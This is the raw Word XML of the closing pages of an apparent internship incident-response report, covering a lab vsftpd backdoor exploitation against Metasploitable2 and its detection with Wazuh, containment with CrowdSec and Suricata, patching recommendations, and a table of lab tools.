      </w:r>
    </w:p>
    <w:p w14:paraId="1F5DA76B" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EC89E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Detection was achieved through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIDS monitoring, which generated Rule 533 (Level 7) alerts within seconds of the attack, identifying anomalous port activity consistent with MITRE T1046 (Network Service Scanning). The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> alerts.log captured all attacker activities including privilege escalation and command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72B763" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF2165A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Containment was executed using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, which applied a 24-hour IP ban on 10.0.2.15 (Decision #29998), effectively blocking further exploitation attempts. Suricata IDS rules were deployed to provide ongoing network-layer detection for FTP backdoor patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545035D0" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242D5278" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations: (1) Immediately patch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to eliminate CVE-2011-2523; (2) Enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> active response for automated IP blocking; (3) Implement network segmentation isolating FTP services; (4) Conduct monthly vulnerability scans and track findings in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>; (5) Develop and test IR playbooks aligned with NIST CSF Respond function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C17A44" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7C7725" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>APPENDIX — Lab Environment &amp; Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F38468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769"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="139B1195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B6BF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8AE1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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="01D231EF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E2C3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Attacker Machine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309F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Kali Linux — IP: 10.0.2.15 — VirtualBox NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="04BC491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2523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Target Machine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8471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Metasploitable2 — IP: 10.0.2.3 — VirtualBox NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="6AB7669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D14B4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Network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02851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NAT Network 10.0.2.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0DFFD30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8A84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HIDS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C35FC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Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Manager 4.x — Active and monitored</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="7C334CB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E614C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Vulnerability Scanner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7603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OpenVAS / Greenbone 24.16.0 — https://127.0.0.1:9392</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="479FF8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2D26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Vuln Management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FD0F5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DefectDojo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> — Deployed and configured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0FB9222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5B61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IDS/IPS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8079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Suricata 8.0.5 — Monitoring eth0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="48CA13A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EE47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Community IPS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07875" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pP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 xml:space="preserve"> 1.4.6 — Decision #29998 applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4D442D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1680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Exploit Framework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FC2E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Metasploit v6.4.126 — vsftpd_234_backdoor module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5C77F1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BC37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Threat Intelligence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6863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MITRE ATT&amp;CK, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>, Hybrid Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0089EECB" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527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1304"/>
        <w:gridCol w:w="4858"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="49400C86" w14:textId="77777777"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A8A5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Practical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AB02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8" w:space="0" w:color="1E3A5F"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E3A5F"/>
              <w:right w:val="single" w:sz="8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3DCF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b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Key Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="57680CEA" w14:textId="77777777"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D5E0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P1 — Threat Hunting / Sigma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C005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single" w:sz="8" w:space="0" w:color="1E3A5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6CBD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Sigma rule for PowerShell; ATT&amp;CK mapped table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5011F55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46438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P2 — Malware Analysis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591D0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7876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Static/dynamic analysis methodology documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5EEBEC5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D5482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P3 — Vulnerability Pipeline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FD386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27C6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OpenVAS scan → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>DefectDojo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 6 vulns prioritized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="79A27F7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591E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lastRenderedPageBreak/>
              <w:t>P4 — IR Simulation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C1B45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F0EA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Caldera + Velociraptor attack chain documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0A0B8F2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13E7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P5 — Network </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Defense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7333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50E8A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 xml:space="preserve">Suricata rules SID:1000001-2; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>CrowdSec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> ban applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="739BC2C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F04BB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P6 — Risk Assessment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5840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6D16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ALE = $2,000/yr; 5x5 risk matrix created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="049FC74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CBB17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P7 — IR Report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236FF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4C613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SANS-template phishing IR report written</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="394FC3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BE84D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P8 — Capstone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B83B9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9416E" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Full attack-detect-contain-report cycle executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43FE4665" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF765F" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CyArt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internship Week 2 | Aman Gour | May 29, 2026</w:t>
      </w:r>
    </w:p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p w14:paraId="6340C036" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="461ABABF" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="0A7B1725" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2F338D2E" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="67BBF407" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="308D93F9" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="427292B8" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="40737FD3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="29FB9978" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="343B65F0" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:sectPr w:rsidR="00C776D2" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9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CD661" w14:textId="77777777" w:rsidR="004C1FD9" w:rsidRDefault="004C1FD9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2800ACC6" w14:textId="77777777" w:rsidR="004C1FD9" w:rsidRDefault="004C1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9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C4811" w14:textId="77777777" w:rsidR="004C1FD9" w:rsidRDefault="004C1FD9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="415E49B8" w14:textId="77777777" w:rsidR="004C1FD9" w:rsidRDefault="004C1F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780791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2288A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5F2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4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3B4604"/>
    <w:rsid w:val="004C1FD9"/>
    <w:rsid w:val="006C5E01"/>
    <w:rsid w:val="006C6527"/>
    <w:rsid w:val="00B00D67"/>
    <w:rsid w:val="00C35F03"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00F03C65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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006C5E01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C5E01"/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DDB34-E2BC-4F25-B8F1-DB1450A97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17</Pages>
  <Words>3502</Words>
  <Characters>19968</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>166</Lines>
  <Paragraphs>46</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23424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 Gour</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-21T00:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-29T06:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>